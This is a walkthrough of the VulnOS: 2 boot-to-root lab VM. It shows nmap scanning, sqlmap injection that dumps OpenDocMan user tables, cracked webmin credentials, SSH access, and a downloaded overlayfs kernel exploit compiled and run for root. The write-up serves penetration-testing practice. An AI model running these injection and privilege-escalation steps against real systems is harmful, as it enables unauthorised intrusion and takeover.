VulnOS: 2 Walkthrough

VulnOS: 2 is a boot to root virtual machine which is hosted on Vulnhub.

Description of the challenge
VulnOS are a series of vulnerable operating systems packed as virtual images to enhance penetration testing skills
This is version 2 -
Smaller, less chaotic !
As time is not always on my side, It took a long time to create another VulnOS. But I like creating them. The image is build with VBOX. Unpack the file and add it to your virtualisation software.
Your assignment is to pentest a company website, get root of the system and read the final flag
NOTE : current keyboard preferences is BE “pentesting is a wide concept”
If you have questions, feel free to contact me on m4db33f@gmail dot com Shout out to the Vulnhub Testing team!
Hope you enjoy.

Identify the IP address of VulnOS machine
Nmap Ping Scan

root@kali:~# nmap -sn
Starting Nmap 7.40 ( ) at 2017-05-19 12:31 EDT
Nmap scan report for
Host is up (0.036s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for
Host is up (0.19s latency).
MAC Address: B4:4B:D2:8C:6F:38 (Apple)
Nmap scan report for
Host is up (0.20s latency).
MAC Address: 70:77:81:C0:6C:33 (Hon Hai Precision Ind.)
Nmap scan report for
Host is up (0.00011s latency).
MAC Address: F4:0F:24:33:5E:D1 (Apple)
Nmap scan report for
Host is up (0.16s latency).
MAC Address: 68:37:E9:88:16:5F (Amazon Technologies)
Nmap scan report for
Host is up (0.00036s latency).
MAC Address: 08:00:27:F9:DD:0B (Oracle VirtualBox virtual NIC)

Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 9.22 seconds

Identify services running on VulnOS

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535
Starting Nmap 7.40 ( ) at 2017-05-19 12:32 EDT
NSE: Loaded 143 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:32
Completed NSE at 12:32, 0.00s elapsed
Initiating NSE at 12:32
Completed NSE at 12:32, 0.00s elapsed
Initiating ARP Ping Scan at 12:32
Scanning [1 port]
Completed ARP Ping Scan at 12:32, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:32
Completed Parallel DNS resolution of 1 host. at 12:32, 0.01s elapsed
Initiating Connect Scan at 12:32
Scanning [65535 ports]
Discovered open port 80/tcp on
Discovered open port 22/tcp on
Discovered open port 6667/tcp on
Completed Connect Scan at 12:32, 2.82s elapsed (65535 total ports)
Initiating Service scan at 12:32
Scanning 3 services on
Completed Service scan at 12:32, 11.05s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against
NSE: Script scanning
Initiating NSE at 12:32
Completed NSE at 12:33, 60.16s elapsed
Initiating NSE at 12:33
Completed NSE at 12:33, 0.01s elapsed
Nmap scan report for
Host is up (0.00041s latency).
Not shown: 65532 closed ports
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|_ 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc ngircd
MAC Address: 08:00:27:F9:DD:0B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Uptime guess: 198.047 days (since Wed Nov 2 11:24:59 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel
1 0.41 ms
NSE: Script Post-scanning.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 76.47 seconds
Raw packets sent: 23 (1.806KB) | Rcvd: 16 (1.330KB)

Port 80 — Enumerating http Apache httpd 2.4.7 ((Ubuntu))

Opening up the URL in the browser.

Lets follow along the hyperlink on the page. We are presented with another website.

The documentation tab gives away some information about a new site and its credentials.

Browsing to the above mentioned folder we reach a new page which gives away the version of the document management system.

Lets search for relevant exploits.

The exploit states that odm_user parameter is vulnerable to SQL injection.


Running Sqlmap to exploit and enumerate admin credentials.

root@kali:~# sqlmap -u "" --dbs --level=5 --risk=3
Output :-
available databases [6]:
[*] drupal7
[*] information_schema
[*] jabcd0cs
[*] mysql
[*] performance_schema
[*] phpmyadmin
root@kali:~# sqlmap -u "" -D jabcd0cs --tables
Output :-
Database: jabcd0cs
[15 tables]
| odm_access_log |
| odm_admin |
| odm_category |
| odm_data |
| odm_department |
| odm_dept_perms |
| odm_dept_reviewer |
| odm_filetypes |
| odm_log |
| odm_odmsys |
| odm_rights |
| odm_settings |
| odm_udf |
| odm_user |
| odm_user_perms |
root@kali:~# sqlmap -u "" -D jabcd0cs -T odm_user --dump

Lets try and crack webmin’s credentials

Username : webmin
Password : webmin1980

Lets login to the machine

root@kali:~# ssh webmin@
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:nIyyJRPJMy1g6F5m8AIT7W//x6lj3ZqhUbYuvSafKeI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
webmin@'s password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation:
System information as of Fri May 19 18:30:25 CEST 2017
System load: 0.0               Memory usage: 5%   Processes:       62
Usage of /: 5.7% of 29.91GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at:
Last login: Wed May  4 10:41:07 2016
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)

Privilege Escalation

$ python -c 'import pty;pty.spawn("/bin/bash")'
webmin@VulnOSv2:~$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
webmin@VulnOSv2:~$ cat /etc/lsb-release
webmin@VulnOSv2:~$ file /bin/ls
/bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=cecbb9e27978d91bc6fe2cc4d46d0cd58deafdb2, stripped

Searching for privilege escalation exploits using the information gathered.

Lets root the server

webmin@VulnOSv2:~$ cd /tmp
webmin@VulnOSv2:/tmp$ wget
--2017-05-19 20:06:06--
Resolving (
Connecting to (||:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [application/txt]
Saving to: ‘37292’
100%[======================================>] 5,123       --.-K/s   in 0s
2017-05-19 20:06:07 (38.5 MB/s) - ‘37292’ saved [5123/5123]
webmin@VulnOSv2:/tmp$ ls
webmin@VulnOSv2:/tmp$ mv 37292 ofs.c
webmin@VulnOSv2:/tmp$ gcc ofs.c -o ofs
webmin@VulnOSv2:/tmp$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
webmin@VulnOSv2:/tmp$ ./ofs

spawning threads
mount #1
mount #2
child threads done
/etc/ created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)

# cat /root/flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?

Happy Hacking !!!